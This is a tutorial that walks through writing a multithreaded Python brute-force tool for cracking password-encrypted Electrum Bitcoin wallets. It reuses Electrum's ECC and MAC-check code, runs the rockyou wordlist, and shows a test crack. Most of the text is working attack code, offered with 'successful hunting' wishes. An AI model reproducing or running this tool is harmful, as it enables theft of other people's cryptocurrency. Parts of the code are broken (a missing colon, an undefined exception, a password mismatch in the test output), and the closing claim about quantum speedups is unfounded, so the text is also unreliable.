Opening encrypted electrum wallets using brute force
WSWOLFWe will conduct a small study of Electrum Bitcoin Wallet (hereinafter EBW), namely:
My favorite: Let's code, parse the EBW source code;
Let's make a multi-threaded brute-force for opening Electrum wallets in Python3;
And, of course, we will test the whole thing.
If you have decided that this topic will be of interest to you, then let's get started. Make your favorite coffee and let's go ...
PS: I will be using OS Ubuntu 16.04, Python 3.7.1, Notepad ++ to develop our brute force.
1. Project creation
First, download Electrum-4.x.x.tar.gz (https://electrum.org/panel-download.html) python source and unpack (I will use version 4.1.2):
cd ~/Downloads && tar -xf Electrum-4.1.2.tar.gz && cd Electrum-4.x.x && ls -w1
and now we have
AUTHORS contrib electrum electrum.desktop Electrum.egg-info LICENCE MANIFEST.in packages PKG-INFO README.rst RELEASE-NOTES run_electrum setup.cfg setup.py
For the project we only need the contents of the "electrum" directory. This directory contains all the python code we need that we will use to build our brute force.
Let's create a working directory:
mkdir ~/EBW_bf mkdir ~/EBW_bf/src cp -r ~/Downloads/Electrum-4.1.2/electrum ~/EBW_bf/ cd ~/EBW_bf
We will work in a virtual python environment, so in the directory with the project we will do the following:
python3 -m venv ./venv && source ./venv/bin/activate
PS: I am accessing python modules via -m, because it is more intuitive for me which version of python I am referring to.
Everything is ready, you can start writing code, or rather copy-paste from the Electrum sources. First, let's get acquainted with the wallet decryption process itself, I will designate it in the form of a diagram:

2. Coding
Let's start with main.py
Here we need the WalletStorage class, which will contain the decryption methods for our wallet. I will ignore the methods we do not need, because we will only focus on password verification. To understand how the initialization of the wallet in Electrum is organized, let's turn to electrum / storage.py, specifically, to the WalletStorage class. When verifying a password (key), Electrum initializes the WalletStorage class and calls the check_password () method from it, which calls the decrypt () method. So .. not very clear, as it seems to me. Let's write this construct in pseudocode for clarity:
init class WalletStorage('path_to_walet') --> check_password(password) --> decrypt(password)
I ended up with this beginning:
import hashlib
import sys
import os
from src import ecc
class WalletStorage(object):
def __init__(self, path):
self.path = os.path.join( os.path.dirname(os.path.realpath(__file__)), path)
self._file_exists = bool(self.path and os.path.exists(self.path))
self.pubkey = None
self.decrypted = ''
with open(self.path, "r", encoding='utf-8') as f:
self.raw = f.read()
def _get_encryption_magic(self):
return b'BIE1'
def decrypt(self, password) -> None:
ec_key = self.get_eckey_from_password(password)
s = False
if self.raw:
enc_magic = self._get_encryption_magic()
s = ec_key.decrypt_message(self.raw, enc_magic)
if s:
print('[+] %s' % password)
def check_password(self, password) -> None:
self.decrypt(password)
@staticmethod
def get_eckey_from_password(password):
secret = hashlib.pbkdf2_hmac('sha512', password.encode('utf-8'), b'', iterations=1024)
ec_key = ecc.ECPrivkey.from_arbitrary_size_secret(secret)
return ec_key
def main():
# get wallet name for args
wallet_name = None
if len(sys.argv) != 2:
print('Usage: %s <wallet_name>' % sys.argv[0])
exit()
else:
wallet_name = sys.argv[1]
if not os.path.exists(wallet_name):
print('Wallet not found in current directory.')
exit()
# init wallet
wallet = WalletStorage(wallet_name)
for password in ['test1', 'passwordTest2']:
wallet.check_password(password)
if __name__ == "__main__":
main = main()
The decrypt method uses the following methods:
get_eckey_from_password - getting the EC_KEY from the secret. The method returns an object of the ECPrivkey class, which we will refer to later.
_get_encryption_magic - getting the encryption method (password, key, etc.). You can notice that I have shortened this method to return b'BIE1 ', since I will only be looking at the password encryption method. BIE1 - the first 4 characters of the wallet, which are responsible for the encryption method (do base64 decode if you don't trust)
The next step is to consider the methods of the ECPrivkey class, specifically, the decrypt_message method, which will give us the desired YES or NO when checking the password. Let's start in order: the first method we call is decrypt (password) -> get_eckey_from_password (password) which refers to the ecc.ECPrivkey.from_arbitrary_size_secret (secret) method
Let's create an ecc.py file in the src working directory, which will contain the ECPrivkey class:
PS: I follow the same naming conventions for the electrum project so that there is no confusion.
it should look like this:
electrum venv main.py src ├── ecc.py └── __init__.py
In __init__.py, let's denote our ecc.py
__init__.py
from . import ecc
Let's start generating ecc.py: at this stage we need the ECPubkey and ECPrivkey classes with the set of methods necessary for our purposes.
First of all, we call the static method of the class: ECPrivkey.from_arbitrary_size_secret (secret), let's see what happens there: refer to electrum / ecc.py
Again, everything is confusing ... let's write it in a readable form:
from_arbitrary_size_secret() --> init class ECPrivkey --> init class ECPubkey
Those. the static method from_arbitrary_size_secret initializes the ECPrivkey class, which in turn initializes the ECPubkey (GENERATOR) class when initialized.
Let's arrange everything:
ecc.py
from typing import Union, Tuple, Optional
from ctypes import (
byref, c_byte, c_int, c_uint, c_char_p, c_size_t, c_void_p, create_string_buffer,
CFUNCTYPE, POINTER, cast
)
import base64
import hashlib
from src.util import assert_bytes
from src.ecc_fast import _libsecp256k1, SECP256K1_EC_UNCOMPRESSED
from src.crypto import hmac_oneshot
def string_to_number(b: bytes) -> int:
return int.from_bytes(b, byteorder='big', signed=False)
def is_secret_within_curve_range(secret: Union[int, bytes]) -> bool:
if isinstance(secret, bytes):
secret = string_to_number(secret)
return 0 < secret < CURVE_ORDER
def _x_and_y_from_pubkey_bytes(pubkey: bytes) -> Tuple[int, int]:
assert isinstance(pubkey, bytes), f'pubkey must be bytes, not {type(pubkey)}'
pubkey_ptr = create_string_buffer(64)
ret = _libsecp256k1.secp256k1_ec_pubkey_parse(
_libsecp256k1.ctx, pubkey_ptr, pubkey, len(pubkey))
if not ret:
raise InvalidECPointException('public key could not be parsed or is invalid')
pubkey_serialized = create_string_buffer(65)
pubkey_size = c_size_t(65)
_libsecp256k1.secp256k1_ec_pubkey_serialize(
_libsecp256k1.ctx, pubkey_serialized, byref(pubkey_size), pubkey_ptr, SECP256K1_EC_UNCOMPRESSED)
pubkey_serialized = bytes(pubkey_serialized)
assert pubkey_serialized[0] == 0x04, pubkey_serialized
x = int.from_bytes(pubkey_serialized[1:33], byteorder='big', signed=False)
y = int.from_bytes(pubkey_serialized[33:65], byteorder='big', signed=False)
return x, y
class ECPubkey(object):
def __init__(self, b: Optional[bytes]):
if b is not None:
assert isinstance(b, (bytes, bytearray)), f'pubkey must be bytes-like, not {type(b)}'
if isinstance(b, bytearray):
b = bytes(b)
self._x, self._y = _x_and_y_from_pubkey_bytes(b)
else:
self._x, self._y = None, None
def is_at_infinity(self):
return self == POINT_AT_INFINITY
def x(self) -> int:
return self._x
def y(self) -> int:
return self._y
def get_public_key_bytes(self, compressed=True):
if self.is_at_infinity(): raise Exception('point is at infinity')
x = int.to_bytes(self.x(), length=32, byteorder='big', signed=False)
y = int.to_bytes(self.y(), length=32, byteorder='big', signed=False)
if compressed:
header = b'\x03' if self.y() & 1 else b'\x02'
return header + x
else:
header = b'\x04'
return header + x + y
def _to_libsecp256k1_pubkey_ptr(self):
pubkey = create_string_buffer(64)
public_pair_bytes = self.get_public_key_bytes(compressed=False)
ret = _libsecp256k1.secp256k1_ec_pubkey_parse(
_libsecp256k1.ctx, pubkey, public_pair_bytes, len(public_pair_bytes))
if not ret:
raise Exception('public key could not be parsed or is invalid')
return pubkey
@classmethod
def _from_libsecp256k1_pubkey_ptr(cls, pubkey) -> 'ECPubkey':
pubkey_serialized = create_string_buffer(65)
pubkey_size = c_size_t(65)
_libsecp256k1.secp256k1_ec_pubkey_serialize(
_libsecp256k1.ctx, pubkey_serialized, byref(pubkey_size), pubkey, SECP256K1_EC_UNCOMPRESSED)
return ECPubkey(bytes(pubkey_serialized))
def __mul__(self, other: int):
if not isinstance(other, int):
raise TypeError('multiplication not defined for ECPubkey and {}'.format(type(other)))
other %= CURVE_ORDER
if self.is_at_infinity() or other == 0:
return POINT_AT_INFINITY
pubkey = self._to_libsecp256k1_pubkey_ptr()
ret = _libsecp256k1.secp256k1_ec_pubkey_tweak_mul(_libsecp256k1.ctx, pubkey, other.to_bytes(32, byteorder="big"))
if not ret:
return POINT_AT_INFINITY
return ECPubkey._from_libsecp256k1_pubkey_ptr(pubkey)
CURVE_ORDER = 0xFFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFE_BAAEDCE6_AF48A03B_BFD25E8C_D0364141
GENERATOR = ECPubkey(bytes.fromhex('0479be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798'
'483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8'))
POINT_AT_INFINITY = ECPubkey(None)
class ECPrivkey(ECPubkey):
def __init__(self, privkey_bytes: bytes):
assert_bytes(privkey_bytes)
if len(privkey_bytes) != 32:
raise Exception('unexpected size for secret. should be 32 bytes, not {}'.format(len(privkey_bytes)))
secret = string_to_number(privkey_bytes)
if not is_secret_within_curve_range(secret):
raise InvalidECPointException('Invalid secret scalar (not within curve order)')
self.secret_scalar = secret
pubkey = GENERATOR * secret
super().__init__(pubkey.get_public_key_bytes(compressed=False))
@classmethod
def from_arbitrary_size_secret(cls, privkey_bytes: bytes):
return ECPrivkey(cls.normalize_secret_bytes(privkey_bytes))
@classmethod
def normalize_secret_bytes(cls, privkey_bytes: bytes) -> bytes:
scalar = string_to_number(privkey_bytes) % CURVE_ORDER
if scalar == 0:
raise Exception('invalid EC private key scalar: zero')
privkey_32bytes = int.to_bytes(scalar, length=32, byteorder='big', signed=False)
return privkey_32bytes
def decrypt_message(self, encrypted: Union[str, bytes], magic: bytes=b'BIE1') -> bytes:
encrypted = base64.b64decode(encrypted)
if len(encrypted) < 85:
return False
magic_found = encrypted[:4]
ephemeral_pubkey_bytes = encrypted[4:37]
ciphertext = encrypted[37:-32]
mac = encrypted[-32:]
if magic_found != magic:
return False
try:
ephemeral_pubkey = ECPubkey(ephemeral_pubkey_bytes)
except InvalidECPointException as e:
return False
ecdh_key = (ephemeral_pubkey * self.secret_scalar).get_public_key_bytes(compressed=True)
key = hashlib.sha512(ecdh_key).digest()
iv, key_e, key_m = key[0:16], key[16:32], key[32:]
if mac != hmac_oneshot(key_m, encrypted[:-32], hashlib.sha256):
return False
else:
return True
Here we refer to:
assert_bytes () from electrum / util.py
_libsecp256k1, SECP256K1_EC_UNCOMPRESSED from electrum / ecc_fast.py (C library for ECDSA signatures and private / public key operations on the secp256k1 curve)
hmac_oneshot () from electrum / crypto.py
Let's borrow them from the corresponding electrum / * py files:
create in the src directory: util.py, ecc_fast.py, crypto.py, respectively.
And now our __init__.py will look like this:
__init__.py
from . import ecc
from . import util
from . import ecc_fast
from . import crypto
Then I thought for you and left everything you need from a heap of unnecessary code:
ecc_fast.py
import os
import sys
import ctypes
from ctypes import (
byref, c_byte, c_int, c_uint, c_char_p, c_size_t, c_void_p, create_string_buffer,
CFUNCTYPE, POINTER, cast
)
SECP256K1_FLAGS_TYPE_MASK = ((1 << 8) - 1)
SECP256K1_FLAGS_TYPE_CONTEXT = (1 << 0)
SECP256K1_FLAGS_TYPE_COMPRESSION = (1 << 1)
# /** The higher bits contain the actual data. Do not use directly. */
SECP256K1_FLAGS_BIT_CONTEXT_VERIFY = (1 << 8)
SECP256K1_FLAGS_BIT_CONTEXT_SIGN = (1 << 9)
SECP256K1_FLAGS_BIT_COMPRESSION = (1 << 8)
# /** Flags to pass to secp256k1_context_create. */
SECP256K1_CONTEXT_VERIFY = (SECP256K1_FLAGS_TYPE_CONTEXT | SECP256K1_FLAGS_BIT_CONTEXT_VERIFY)
SECP256K1_CONTEXT_SIGN = (SECP256K1_FLAGS_TYPE_CONTEXT | SECP256K1_FLAGS_BIT_CONTEXT_SIGN)
SECP256K1_CONTEXT_NONE = (SECP256K1_FLAGS_TYPE_CONTEXT)
SECP256K1_EC_COMPRESSED = (SECP256K1_FLAGS_TYPE_COMPRESSION | SECP256K1_FLAGS_BIT_COMPRESSION)
SECP256K1_EC_UNCOMPRESSED = (SECP256K1_FLAGS_TYPE_COMPRESSION)
class LibModuleMissing(Exception): pass
def load_library()
library_paths = ['/usr/lib/libsecp256k1.so.0']
exceptions = []
secp256k1 = None
for libpath in library_paths:
try:
secp256k1 = ctypes.cdll.LoadLibrary(libpath)
except BaseException as e:
exceptions.append(e)
else:
break
if not secp256k1:
print(f'libsecp256k1 library failed to load. exceptions: {repr(exceptions)}')
return None
try:
secp256k1.secp256k1_context_create.argtypes = [c_uint]
secp256k1.secp256k1_context_create.restype = c_void_p
secp256k1.secp256k1_context_randomize.argtypes = [c_void_p, c_char_p]
secp256k1.secp256k1_context_randomize.restype = c_int
secp256k1.secp256k1_ec_pubkey_create.argtypes = [c_void_p, c_void_p, c_char_p]
secp256k1.secp256k1_ec_pubkey_create.restype = c_int
secp256k1.secp256k1_ecdsa_sign.argtypes = [c_void_p, c_char_p, c_char_p, c_char_p, c_void_p, c_void_p]
secp256k1.secp256k1_ecdsa_sign.restype = c_int
secp256k1.secp256k1_ecdsa_verify.argtypes = [c_void_p, c_char_p, c_char_p, c_char_p]
secp256k1.secp256k1_ecdsa_verify.restype = c_int
secp256k1.secp256k1_ec_pubkey_parse.argtypes = [c_void_p, c_char_p, c_char_p, c_size_t]
secp256k1.secp256k1_ec_pubkey_parse.restype = c_int
secp256k1.secp256k1_ec_pubkey_serialize.argtypes = [c_void_p, c_char_p, c_void_p, c_char_p, c_uint]
secp256k1.secp256k1_ec_pubkey_serialize.restype = c_int
secp256k1.secp256k1_ecdsa_signature_parse_compact.argtypes = [c_void_p, c_char_p, c_char_p]
secp256k1.secp256k1_ecdsa_signature_parse_compact.restype = c_int
secp256k1.secp256k1_ecdsa_signature_normalize.argtypes = [c_void_p, c_char_p, c_char_p]
secp256k1.secp256k1_ecdsa_signature_normalize.restype = c_int
secp256k1.secp256k1_ecdsa_signature_serialize_compact.argtypes = [c_void_p, c_char_p, c_char_p]
secp256k1.secp256k1_ecdsa_signature_serialize_compact.restype = c_int
secp256k1.secp256k1_ecdsa_signature_parse_der.argtypes = [c_void_p, c_char_p, c_char_p, c_size_t]
secp256k1.secp256k1_ecdsa_signature_parse_der.restype = c_int
secp256k1.secp256k1_ecdsa_signature_serialize_der.argtypes = [c_void_p, c_char_p, c_void_p, c_char_p]
secp256k1.secp256k1_ecdsa_signature_serialize_der.restype = c_int
secp256k1.secp256k1_ec_pubkey_tweak_mul.argtypes = [c_void_p, c_char_p, c_char_p]
secp256k1.secp256k1_ec_pubkey_tweak_mul.restype = c_int
secp256k1.secp256k1_ec_pubkey_combine.argtypes = [c_void_p, c_char_p, c_void_p, c_size_t]
secp256k1.secp256k1_ec_pubkey_combine.restype = c_int
# --enable-module-recovery
try:
secp256k1.secp256k1_ecdsa_recover.argtypes = [c_void_p, c_char_p, c_char_p, c_char_p]
secp256k1.secp256k1_ecdsa_recover.restype = c_int
secp256k1.secp256k1_ecdsa_recoverable_signature_parse_compact.argtypes = [c_void_p, c_char_p, c_char_p, c_int]
secp256k1.secp256k1_ecdsa_recoverable_signature_parse_compact.restype = c_int
except (OSError, AttributeError):
raise LibModuleMissing('libsecp256k1 library found but it was built '
'without required module (--enable-module-recovery)')
secp256k1.ctx = secp256k1.secp256k1_context_create(SECP256K1_CONTEXT_SIGN | SECP256K1_CONTEXT_VERIFY)
ret = secp256k1.secp256k1_context_randomize(secp256k1.ctx, os.urandom(32))
if not ret:
print('secp256k1_context_randomize failed')
return None
return secp256k1
except (OSError, AttributeError) as e:
print(f'libsecp256k1 library was found and loaded but there was an error when using it: {repr(e)}')
return None
_libsecp256k1 = None
try:
_libsecp256k1 = load_library()
except BaseException as e:
print(f'failed to load libsecp256k1: {repr(e)}')
if _libsecp256k1 is None:
# hard fail:
sys.exit(f"Error: Failed to load libsecp256k1.")
Make sure to change the path to libsecp256k1! It is presented as a list in the load_library () method
It is worth noting because I am writing a brute under Ubuntu, then I left the only way to detect libsecp256k1:
library_paths = ['/usr/lib/x86_64-linux-gnu/libsecp256k1.so.0']
PS: To find libsecp256k1.so.0 on your system, use the find utility:
find /usr/ -iname "libsecp256k1.so.0"
util.py
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
crypto.py
import hmac
from src.util import assert_bytes
def hmac_oneshot(key: bytes, msg: bytes, digest) -> bytes:
if hasattr(hmac, 'digest'):
# requires python 3.7+; faster
return hmac.digest(key, msg, digest)
else:
return hmac.new(key, msg, digest).digest()
Ready! It remains to deal with the not yet very clear ecc.py
I will duplicate so that you do not scroll:
ecc.py
from typing import Union, Tuple, Optional
from ctypes import (
byref, c_byte, c_int, c_uint, c_char_p, c_size_t, c_void_p, create_string_buffer,
CFUNCTYPE, POINTER, cast
)
import base64
import hashlib
from src.util import assert_bytes
from src.ecc_fast import _libsecp256k1, SECP256K1_EC_UNCOMPRESSED
from src.crypto import hmac_oneshot
def string_to_number(b: bytes) -> int:
return int.from_bytes(b, byteorder='big', signed=False)
def is_secret_within_curve_range(secret: Union[int, bytes]) -> bool:
if isinstance(secret, bytes):
secret = string_to_number(secret)
return 0 < secret < CURVE_ORDER
def _x_and_y_from_pubkey_bytes(pubkey: bytes) -> Tuple[int, int]:
assert isinstance(pubkey, bytes), f'pubkey must be bytes, not {type(pubkey)}'
pubkey_ptr = create_string_buffer(64)
ret = _libsecp256k1.secp256k1_ec_pubkey_parse(
_libsecp256k1.ctx, pubkey_ptr, pubkey, len(pubkey))
if not ret:
raise InvalidECPointException('public key could not be parsed or is invalid')
pubkey_serialized = create_string_buffer(65)
pubkey_size = c_size_t(65)
_libsecp256k1.secp256k1_ec_pubkey_serialize(
_libsecp256k1.ctx, pubkey_serialized, byref(pubkey_size), pubkey_ptr, SECP256K1_EC_UNCOMPRESSED)
pubkey_serialized = bytes(pubkey_serialized)
assert pubkey_serialized[0] == 0x04, pubkey_serialized
x = int.from_bytes(pubkey_serialized[1:33], byteorder='big', signed=False)
y = int.from_bytes(pubkey_serialized[33:65], byteorder='big', signed=False)
return x, y
class ECPubkey(object):
def __init__(self, b: Optional[bytes]):
if b is not None:
assert isinstance(b, (bytes, bytearray)), f'pubkey must be bytes-like, not {type(b)}'
if isinstance(b, bytearray):
b = bytes(b)
self._x, self._y = _x_and_y_from_pubkey_bytes(b)
else:
self._x, self._y = None, None
def is_at_infinity(self):
return self == POINT_AT_INFINITY
def x(self) -> int:
return self._x
def y(self) -> int:
return self._y
def get_public_key_bytes(self, compressed=True):
if self.is_at_infinity(): raise Exception('point is at infinity')
x = int.to_bytes(self.x(), length=32, byteorder='big', signed=False)
y = int.to_bytes(self.y(), length=32, byteorder='big', signed=False)
if compressed:
header = b'\x03' if self.y() & 1 else b'\x02'
return header + x
else:
header = b'\x04'
return header + x + y
def _to_libsecp256k1_pubkey_ptr(self):
pubkey = create_string_buffer(64)
public_pair_bytes = self.get_public_key_bytes(compressed=False)
ret = _libsecp256k1.secp256k1_ec_pubkey_parse(
_libsecp256k1.ctx, pubkey, public_pair_bytes, len(public_pair_bytes))
if not ret:
raise Exception('public key could not be parsed or is invalid')
return pubkey
@classmethod
def _from_libsecp256k1_pubkey_ptr(cls, pubkey) -> 'ECPubkey':
pubkey_serialized = create_string_buffer(65)
pubkey_size = c_size_t(65)
_libsecp256k1.secp256k1_ec_pubkey_serialize(
_libsecp256k1.ctx, pubkey_serialized, byref(pubkey_size), pubkey, SECP256K1_EC_UNCOMPRESSED)
return ECPubkey(bytes(pubkey_serialized))
def __mul__(self, other: int):
if not isinstance(other, int):
raise TypeError('multiplication not defined for ECPubkey and {}'.format(type(other)))
other %= CURVE_ORDER
if self.is_at_infinity() or other == 0:
return POINT_AT_INFINITY
pubkey = self._to_libsecp256k1_pubkey_ptr()
ret = _libsecp256k1.secp256k1_ec_pubkey_tweak_mul(_libsecp256k1.ctx, pubkey, other.to_bytes(32, byteorder="big"))
if not ret:
return POINT_AT_INFINITY
return ECPubkey._from_libsecp256k1_pubkey_ptr(pubkey)
CURVE_ORDER = 0xFFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFE_BAAEDCE6_AF48A03B_BFD25E8C_D0364141
GENERATOR = ECPubkey(bytes.fromhex('0479be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798'
'483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8'))
POINT_AT_INFINITY = ECPubkey(None)
class ECPrivkey(ECPubkey):
def __init__(self, privkey_bytes: bytes):
assert_bytes(privkey_bytes)
if len(privkey_bytes) != 32:
raise Exception('unexpected size for secret. should be 32 bytes, not {}'.format(len(privkey_bytes)))
secret = string_to_number(privkey_bytes)
if not is_secret_within_curve_range(secret):
raise InvalidECPointException('Invalid secret scalar (not within curve order)')
self.secret_scalar = secret
pubkey = GENERATOR * secret
super().__init__(pubkey.get_public_key_bytes(compressed=False))
@classmethod
def from_arbitrary_size_secret(cls, privkey_bytes: bytes):
return ECPrivkey(cls.normalize_secret_bytes(privkey_bytes))
@classmethod
def normalize_secret_bytes(cls, privkey_bytes: bytes) -> bytes:
scalar = string_to_number(privkey_bytes) % CURVE_ORDER
if scalar == 0:
raise Exception('invalid EC private key scalar: zero')
privkey_32bytes = int.to_bytes(scalar, length=32, byteorder='big', signed=False)
return privkey_32bytes
def decrypt_message(self, encrypted: Union[str, bytes], magic: bytes=b'BIE1') -> bytes:
encrypted = base64.b64decode(encrypted)
if len(encrypted) < 85:
return False
magic_found = encrypted[:4]
ephemeral_pubkey_bytes = encrypted[4:37]
ciphertext = encrypted[37:-32]
mac = encrypted[-32:]
if magic_found != magic:
return False
try:
ephemeral_pubkey = ECPubkey(ephemeral_pubkey_bytes)
except:
return False
ecdh_key = (ephemeral_pubkey * self.secret_scalar).get_public_key_bytes(compressed=True)
key = hashlib.sha512(ecdh_key).digest()
iv, key_e, key_m = key[0:16], key[16:32], key[32:]
if mac != hmac_oneshot(key_m, encrypted[:-32], hashlib.sha256):
return False
else:
return True
Public key creation dates back to
pubkey = GENERATOR * secret
The GENERATOR variable is ECPubkey (bytes.fromhex ('...')). those. a prototype of the ECPubkey class. To multiply an ECPubkey by an int, you need to consider the presence of the __mul__ (multiplication) method in the ECPubkey class.
Now let's take a look at the long-awaited decrypt_message () method, which is called in main.py and should return the result to us. It's worth noting at this point that we have already initialized the ECPubkey and ECPrivkey classes earlier (keep that in mind)
def decrypt_message(self, encrypted: Union[str, bytes], magic: bytes=b'BIE1') -> bytes: encrypted = base64.b64decode(encrypted) if len(encrypted) < 85: return False magic_found = encrypted[:4] ephemeral_pubkey_bytes = encrypted[4:37] ciphertext = encrypted[37:-32] mac = encrypted[-32:] if magic_found != magic: return False try: ephemeral_pubkey = ECPubkey(ephemeral_pubkey_bytes) except: return False ecdh_key = (ephemeral_pubkey * self.secret_scalar).get_public_key_bytes(compressed=True) key = hashlib.sha512(ecdh_key).digest() iv, key_e, key_m = key[0:16], key[16:32], key[32:] # here we will only leave return False if the password does not match the desired one and return False otherwise. if mac != hmac_oneshot(key_m, encrypted[:-32], hashlib.sha256): return False else: return True
Here we see how our wallet is torn to pieces, followed by magic calculations based on ephemeral_pubkey (temporary public key) and finally, if mac is not equal to hmac_oneshot (key_m, encrypted [: - 32], hashlib.sha256) then "the next password is pseudo ". Well, here we are almost at the finish line, it remains to wrap the whole thing in multithreading and test it.
To achieve multithreading, we will use ThreadExecutorPool (as anyone, but I'm just used to working with it). In order not to overload the already occupied memory, we will read the file with passwords line by line, and not load all of them into memory.
Here's what I suggest:
que = []
with open(file_with_password, 'r', errors='replace') as fd:
for password in fd:
password = password.rstrip()
que.append(password)
if len(que) == 1000:
with ThreadPoolExecutor(max_workers=4) as pool:
pool.map(worker, que)
que = []
if len(que) > 0:
with ThreadPoolExecutor(max_workers=4) as pool:
pool.map(worker, que)
Let's add a progress bar by installing a convenient tqdm package:
python3 -m pip install tqdm
It is worth noting here that before starting to brute force passwords, we will have to find out the total number of passwords in the dictionary in order to display the progress.
As a result, we get something like this:
main.py
from concurrent.futures import ThreadPoolExecutor
from tqdm import tqdm
import hashlib
import sys
import os
from src import ecc
class WalletStorage(object):
def __init__(self, path):
self.path = os.path.join( os.path.dirname(os.path.realpath(__file__)), path)
self._file_exists = bool(self.path and os.path.exists(self.path))
self.pubkey = None
self.decrypted = ''
with open(self.path, "r", encoding='utf-8') as f:
self.raw = f.read()
def _get_encryption_magic(self):
return b'BIE1'
def decrypt(self, password) -> None:
ec_key = self.get_eckey_from_password(password)
s = False
if self.raw:
enc_magic = self._get_encryption_magic()
s = ec_key.decrypt_message(self.raw, enc_magic)
if s:
print()
print('[+] %s' % password)
exit()
def check_password(self, password) -> None:
global PBAR
self.decrypt(password)
PBAR.update(1)
@staticmethod
def get_eckey_from_password(password):
secret = hashlib.pbkdf2_hmac('sha512', password.encode('utf-8'), b'', iterations=1024)
ec_key = ecc.ECPrivkey.from_arbitrary_size_secret(secret)
return ec_key
def main():
global PBAR
# get wallet name for args
wallet_name = None
if len(sys.argv) != 2:
print('Usage: %s <wallet_name>' % sys.argv[0])
exit()
else:
wallet_name = sys.argv[1]
if not os.path.exists(wallet_name):
print('Wallet not found in current directory.')
exit()
# init wallet
wallet = WalletStorage(wallet_name)
print('loading dict ...')
dict_len = 0
with open('rockyou.txt', 'r', errors='replace') as fd:
for line in fd:
dict_len += 1
print('starting...')
print()
PBAR = tqdm(total=dict_len)
que = []
with open('rockyou.txt', 'r', errors='replace') as fd:
for password in fd:
password = password.rstrip()
que.append(password)
if len(que) == 1000:
with ThreadPoolExecutor(max_workers=4) as pool:
pool.map(wallet.check_password, que)
que = []
if len(que) > 0:
with ThreadPoolExecutor(max_workers=4) as pool:
pool.map(wallet.check_password, que)
if __name__ == "__main__":
main = main()
and this
venv electrum rockyou.txt main.py src ├── crypto.py ├── ecc_fast.py ├── ecc.py ├── __init__.py └── util.py
3 Testing!
We will use the well-known rockyou as a dictionary.
Let's create a wallet with a simple password (mine is password123), copy it to the working directory and start testing.
PS: set the password that is in the dictionary for testing. Our task is to make sure that the script is working correctly, and then do whatever your heart desires.
cp ~/.electrum/wallets/test_wallet ~/EBW_bf python3 main.py test_wallet
The PC is noisy, and we just wait:)
loading dict ... starting... 38%|█████████▉ | 5491654/14344324 [6489.81it/s] [+] testpassword123
PwN! The result was not long in coming. I hope in this article you have emphasized something for yourself and will use the knowledge gained in the future (of course for good purposes). Successful hunting everyone!
if you have the opportunity to use azure quantum, then the speed of work on those pc is 500-1000 times faster than usual.